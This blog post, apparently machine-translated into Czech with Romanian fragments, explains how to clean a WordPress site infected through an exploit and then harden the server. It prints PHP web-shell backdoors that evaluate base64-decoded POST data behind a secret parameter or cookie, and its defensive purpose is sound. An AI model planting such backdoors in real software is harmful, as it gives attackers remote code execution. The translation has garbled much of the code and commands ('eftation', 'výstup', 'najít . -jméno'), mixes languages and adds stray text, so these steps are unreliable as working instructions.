Než si přečtete tento příspěvek, musíte vidět Příspěvek zde, něco pochopit. :)

Našel jsem v několika souborech blogů na StealthSetts.com, kódech podobných těm níže, které se objevily v důsledku viru s Exploitul de WordPress.:

<? Php if ($ _ get [‘573abcb060974771 '] ==”8E96D1B4B674E1D2″) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?>

a

<? Php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?>

Ve výše uvedeném případě jde o soubor xmlrpc.php z Ospalý, ale na a Grep Na serveru můžete vidět, že ve zdrojích je poměrně mnoho kódů svého druhu.

Čištění infikovaných souborů:

OOOOKKKKKYOUAK
1. Nejlepší řešení po dokončení zálohování-ul si curatata baza de date, este sa VYMAZAT fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<? Php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eftation (base64_decode ($ _ post [‘file '])); výstup; }?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

najít . -jméno “*_New.php”
najít . -jméno “*_old.php”
najít . -jméno “*.jpgg”
najít . -jméno “* _giff”
najít . -jméno “*_pnggg”
najít . -jméno “wp-info.txt”

3. in /tmp , hledat a smazat složky jako TMPYWBZT2

Čištění SQL :

1. V tabulce tabulky wp_options Zjistěte, zda existují a smažte řádky: interní_links_cache, Ris_F541B3ABD05E7962FCAB37737F40FAD8 a wordpress_options.

2.. Také v wp_options přejděte na aktivní_plugins A smažte, pokud existuje, plugin, který končí jedním z rozšíření *_new.php, *_old.php, *.jpgg, *.giff, *.pnggg nebo pokud existuje další podezřelé rozšíření, opatrně zkontrolujte.

3. v tabulce wp_users, zjistěte, zda existuje uživatel, který nemá co psát vedle něj, ve sloupci user_nicename. Odstraňte tohoto uživatele, ale ponechte si číslo ve sloupci ID. Tento uživatel je možné použít „WordPress“ jako user_Login A zdá se, že je vytvořen na 00:00 0000-00-00.

4. Jděte ke stolu WP_USERMETA a odstranit všechny řádky, které patří do výše uvedeného ID.

Poté, co jste provedli toto čištění SQL, deaktivujte a poté aktivujte nějaký plugin. (v blogu -> Dashboard -> Pluginy)

Sekurizace serveru:

1. Podívejte se, které adresáře a soubory jsou “zapisovatelný„(Chmod 777) a pokuste se na ně dát Chmod což jim již neumožňuje psát z jakékoli úrovně. (Například chmod 644)

najít. -Perm -2 –LS

2. Podívejte se, jaké soubory nastavily bit jižní nebo brusle . Pokud tyto soubory na ně nepoužíváte chmod 0 nebo odinstalovat balíček, který obsahuje. Jsou velmi nebezpeční, protože vystupují s privilegiami “skupina"Nebo"vykořenit„A ne s oprávněními normálního uživatele, který tento soubor provádí.

najít / -typ f -perm -04000 -ls
najít / -typ f -perm -02000 -ls

3. Zkontrolujte, které porty jsou otevřené, a pokuste se zavřít nebo zajistit ty, které se nepoužívají.

netstat -an | grep -i seznam

To je asi tak všechno. to vidím některé blogy jsou zakázány ve Vyhledávání Google a další říkají „Výborně!!!“ . No, udělal bych to pro ně...ale co říkáte, když Google začne banovat všechny weby kdo to dělá SPAMUJEM a balí trojské koně (Trojan.Clicker.HTML) v cookies?